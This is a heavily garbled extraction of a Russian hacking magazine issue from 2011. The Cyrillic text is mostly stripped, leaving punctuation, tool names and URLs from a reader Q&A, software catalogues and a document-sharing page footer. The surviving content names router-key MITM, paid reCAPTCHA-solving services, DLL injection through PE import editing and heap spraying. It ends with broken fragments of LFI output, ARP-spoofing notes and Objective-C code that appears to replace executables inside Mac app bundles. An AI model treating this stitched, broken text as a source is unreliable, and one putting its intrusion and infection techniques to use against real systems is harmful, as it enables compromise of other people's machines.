, , DD-WRT:

firmware , , VPN
. ,
? , ,
.
LittleBlackBox (code.
google.com/p/littleblackbox), .

,
. -
LittleBlackBox .

.
LittleBlackBox

,
DDWRT. , ,
126
,
Cisco, Linksys, D-Link Netgear.

MITM-.
Q: SMTP
, - . :). ,
-
SMTP-?
A:
NwSMTP (github.com/khanton/
NwSMTP). -,
SSL,
RBL, - .
.. -,
.
Q: ,
reCAPTCHA (google.com/recaptcha),
.
? ?
A:
, . ,
CAPTCHA
. , DeCaptcher
(decaptcher.com),
, , ,
.
API
(C/C++, C#, Perl, PHP Python),

, ( )

.
, .
Q:

ModSecurity. -
?
A: REMO Rule Editor for
ModSecurity (netnea.com/cms/?q=remo).

, whitelist
-.

, ModSecurity
-
. REMO
Ruby
,
Ruby 1.8 .
Q: DEP
?
A: , DEP (Data Execution
Prevention) ,

Windows,
,
.
: , . DLL-
EnforcePermanentDEP (blog.didierstevens.
com/2010/11/08/enforcepermanentdep).
,
DLL SetProcessDEPPolicy
PROCESS_DEP_ENABLE,

DEP.
.
Q: : DLL ?
A: . . ?
.
DLL,
.
DLL-,
PE-, , LorePE (woodmann.net/collaborative/
tools/index.php/LordPE). ,
<PE Editor>
.
, PE-, <Directories>
<...> Import
table.
DLL-. Add import,
DLL,
, . ,
.

LoadDLLViaAppInit (blog.didierstevens.
com/2010/10/26/update-loaddllviaappinit).

DLL-,
. , :
acrord32.exe hook-createprocess.dll;
EnforcePermanentDEP.dll
X 02 /145/ 2011
>Multimedia
aTunes 2.0.1
Desktop Earth 2.1.1
Format Factory 2.60
FreeOCR OCR Software V3.0
IOGraph 0.9
IrfanView 4.28
jPDF Tweak 1.0
MediaInfo 0.7.39
MiniLyrics 7.0
MorphVOX Junior 2.7.5
MP3Gain 1.2.5
Songbird 1.8.0
UVScreenCamera 4.7beta
webcamXP 5.5.0.8
Wink 2.0
xbmc 10.0
>Misc
AM-DeadLink 4.4
Awesome Duplicate Photo Finder
Ceedo Personal
CLCL 1.1.2
Eastegger 5.9.0.559
eXtra Buttons
Just Gestures 1.0
LastPass 1.70.1
multibar 0.9.9.9
Nocs 2.2 beta
QTTabBar 1.2.2.1
RegScanner 1.83
The Batch File Rename Utility 0.6
ToolBox 2.85
Windy - Window Manager
Xinorbis 5.2
YoWindow 2.0
>Games
Hedgewars 0.9.15
>>WINDOWS
>Development
ASMTool 1.3.1BETA
BitRock InstallBuilder 7.0.1
CodeLite 2.8.0.4537
CodeLobster PHP Edition 3.6.4
DiffMerge 3.3.0
E-TextEditor 2.0.1
EmEditor Professional 10.0.4
HTTP Debugger Pro 4.4
IntellijIDEA 10
Komodo Edit 6.0.3
NSIS 2.46
PyPy 1.4
ReSharper 5.1.1
SharpDevelop 4.0 (beta)
Spyder v2.0.5
SQL Uniform 2.1
Syser Kernel Debugger 1.99
TortoiseSVN 1.6.12
UltraGram 4.2.50
Unique 0.25
VisualSVN 2.0.5
WaveMaker 6.2.5
WinHex 15.8
>>UNIX
>Desktop
Album Player 0.3.1
Asunder 2.0
BRL-CAD 7.18.0
Camera Life 2.6.3
FxMovieManager 4.6
GoldenDict 1.0
>System
Apache Logs Viewer 2.32
BleachBit 0.8.6
Comodo System-Cleaner 3.0
Defraggler 2.01
Disk Bench 2.6.1.0
EASEUS Todo Backup Home 2.0
HeavyLoad 3.0
HP USB Disk Storage Format Tool
2.1.8
Macrium Reflect Free 4.2
Macro Recorder 4.71 Trial
MBRCheck
Parted Magic 5.8
VirtualBox 4.0
VMWare Disk Mount GUI
VMware Workstation 7.1
win-get
>Security
Armitage 12.13.10
CFF Explorer VII
hashcat 0.35
Immunity Debugger v1.80
IOCTL Fuzzer 1.2
JavaSnoop 1.0
Kernel Detective v1.4.1
lfimap 1.4.5
OllyDbg 2.01a
OWASP HTTP Post Tool 3.6
Peach 2.3.7
Snort 2.9.0.2
sqlinject-finder
SSA v2.0 Beta 002
thicknet
Web Crawler 0.2
Windows System State Analyzer
>Net
CCNA Network Visualizer 6.0
Connectify 2.1.0
Cyberduck 4.0b8
Dropbox 1.0.10
Evernote 4.1.0
GNS3 0.7.3
Helicon Ape
NetBalancer
NetDrive 1.2.0.4
NetworkMiner 0.92
Opera 11.00
PrinterShare 2.3.4
Shelfsters Desktop Tool
TeamSpeak3 3.0.0
TeamViewer 6.0
wipfw 0.2.8
WirelessMon 3.1
>Security
Aanval 6
Armitage 12.13.10
cvechecker 2.0
Dns2tcp 0.5.2
droidmap 0.01
floppyfw 3.0.14
honggfuzz 0.1
ipset 5.2
>Net
bareFTP 0.3.7
cURL 7.21.3
Downpour 0.2
Getmail 4.20
Google Chrome 8.0.552.224
Kiwix 0.9
LeechCraft 0.4.0
Lftp 4.1.1
LinkChecker 6.1
LogJam 4.6.0
Mozilla Firefox 3.6.13
Opera 11.00
qBittorrent 2.5
quIRC 0.6.2
Speedometer 2.7
Spicebird 0.8
w3m 0.5.2
Xymon 4.2.3
>Games
Zero Ballistics 2.0
>Devel
Arcadia 0.9.2
BitRock InstallBuilder 7.0.1
Cadaz Linux 1.0
CodeLite 2.8.0.4537
Codemetre 0.29.2
FormBuilder 1.1.4
GSL shell 1.0
IntellijIDEA 10
Lapack 3.3.0
LXRAD 0.6
Modula-2 1.0
MyJSQLView 3.23
Neoeedit 1.0
PyPy 1.4
Spyderlib 2.0
SQL Uniform 2.1
Unique 0.25
WaveMaker 6.2.5
Google Earth 6
Merkaartor 0.16.3
mhWaveEdit 1.4.20
MoreAmp 0.1.26
Personal File Manager 2.10.8
Pinta 0.5
Popper 0.24
QComicBook 0.7.2
Scilab 5.3.0
Videoporama 0.8
Wally 2.4.1
XNeur 0.11.1
>>MAC
Alarms 1.1.1
AutoRate 1.6
Calibre 0.7.34
cURL 7.21.3
Fraise 3.7.3
Fseventer 2.7.6
Kaleidoscope 1.1.1
Knapsack 2.1
MarsEdit 3.1.4
Parallels Desktop 6 Mac
Postbox 2.1.0
Server Admin Tools 10.6
Soulver 2.0.2
Sparrow beta 7
Steam 1.1
Transmit 4.1.4
Velocity 2.0
Wireshark 1.4.2
Woopra 1.4
>X-distr
Chromium OS - VMware
Chromium OS -
Linux Mint 10
>System
AQEMU 0.8.1
ATI Catalyst 10.12
Backintime 1.0.4
Coreutils 8.8
FindDup
Linux Kernel 2.6.36.2
nVidia 260.19.29
QEMU 0.13.0
RemoteBox 0.5
Skulker 2.1
Softgun 0.19
TimeVault 0.7.5
UnusedPkg 0.6
VirtualBox 4.0.0
X.Org 7.6
JavaSnoop 1.0
Lfimap 1.4.7
Ostinato 0.3
Packet Fence 2.0.0
PuzlBox 1.0.2.2
quefuzz 0.7.2
Skipfish 1.82
Snorby 2.0
Snort 2.9.0.2
SQLInject Finder
Suricata 1.0.2
Sydbox 0.7.2
THC-Hydra 5.9
thicknet
Tor 0.2.1.28
USBsploit 0.5
VMvicnum 14
volatilitux 1.0
WackoPicko
xplico 0.6.1
Zero Wine 2.0
02(145) 2011
UNITS
HTTP://WWW2
GmadS
Goozzy
www.madnet.name/tools/madss
www.goozzy.com

, ,
Google. ,
. GmadS, ,

. . . , , ,
(ReverseIP),
.
? ,
. ,
, -. . , . , , ,
! -
. :). ,
, .
, Goozzy
.
Heap
Spraying
Heap spray generator HackerTarget

bit.ly/small_heap_spray_generator
www.hackertarget.com
Heap Spraying,
.
, (, IE)
- ,
.
, NOP-
( ) -.
NOP, NOP
, ,
. NOP -,
! Heap Spraying
Java-,
.
, ,
cloud- . HackerTarget
x-toolz,
.
: Nmap, OpenVas, SQLiX,
sqlmap, Nikto, Joomla Security Scan, Sub Domain Scanner
fingerprinting-.
:
, e-mail ( ),
.
128
X 02 (145) 2011
>> coding
3 -
: 12 , 6
3 .
, ? ? .
- .

Хакер 2011 02 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 02 PDF

Загружено:

Авторское право:

Доступные форматы

.

> GAMES & DIGITAL

Windows Phone 7 Marketplace $99,

2015 Intel, AMD, Dell, Lenovo, Samsung LG

The Pirate Bay, , , ,

DVI-D VESA Stereo Sync,

Google Chrome 800

: AMD PHENOM II X6 1090T (3,2 )

ADATA S596 USB-. , ,

Intel , Intel X25-M G2

Intel X25-M G2,

PCMark, Windows Defender, /c

PCMark, Windows Vista startup, /

Kingston ssdNOW V+ 512 GB

PCMark, Windows Media Center, /

PCMark, Application loading, /

Kingston ssdNOW V+ 512 GB

CrystalDiskMark, Sequential read, /c

CrystalDiskMark, Random read 4KB, /c

Kingston ssdNOW V+ 512 GB

CrystalDiskMark, Random write 4KB, /c

CrystalDiskMark, Sequential write, /

Kingston ssdNOW V+ 512 GB

Kingston ssdNOW V+ 512 GB

Speed: 363 KB/s

4.388 KB of 22.959 KB (19%)

6.913 KB of 25.484 KB (27%)

IDA Plugin API

Other Python Modules

IDA + Python = IDAPython

HVM CentOS 5.5,

, , Google Chrome OS.

Hexxeh Chromium OS:

./tnscmd.pl -h 192.168.0.100 --rawcmd

Windows XP, 2003, Vista, 2008, 7

Linux Kernel <= 2.6.37

strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

Kingcope serverside Open Source

exim 4.64 (lists.exim.org/lurker/messag

, (sub_4010B2, sub_401298, sub_401169);

Flood VLR HLR,

file name with a four-character hash code and then

Warning: include(/images/../a<) [function.include]:

Warning: include(/images/../a<) [function.include]:

FindFirstFile MSDN . 2007 ...

Domain Controller with clients

, file.txt IP-. ? 80%

Cain&Abel. DNS spoofing

ARP-SPOOFING + RDP MitM

4. : killall -SIGUSCR1 conky.

: OWASP HTTP Post

OWASP 2010 Application Security

Mac Classic ( , Mac

Mach- , Mac OS X. a.out.

[plist_dict objectForKey: @"CFBundleExecutable"];

[[NSBundle mainBundle] bundlePath];

@"/%@/Contents/MacOS/%@", app, app_executable]

[bundle_fldr stringByAppendingString: @"/.."];

@"/%@/Contents/MacOS/old"] error: nil];

[[fm directoryContentsAtPath: our_fldr]

@"self ENDSWITH '.app'"]];

for (NSString * app in apps){

system([[[[NSBundle mainBundle] bundlePath]

call dword ptr [impconnect@12 (4183B0h)]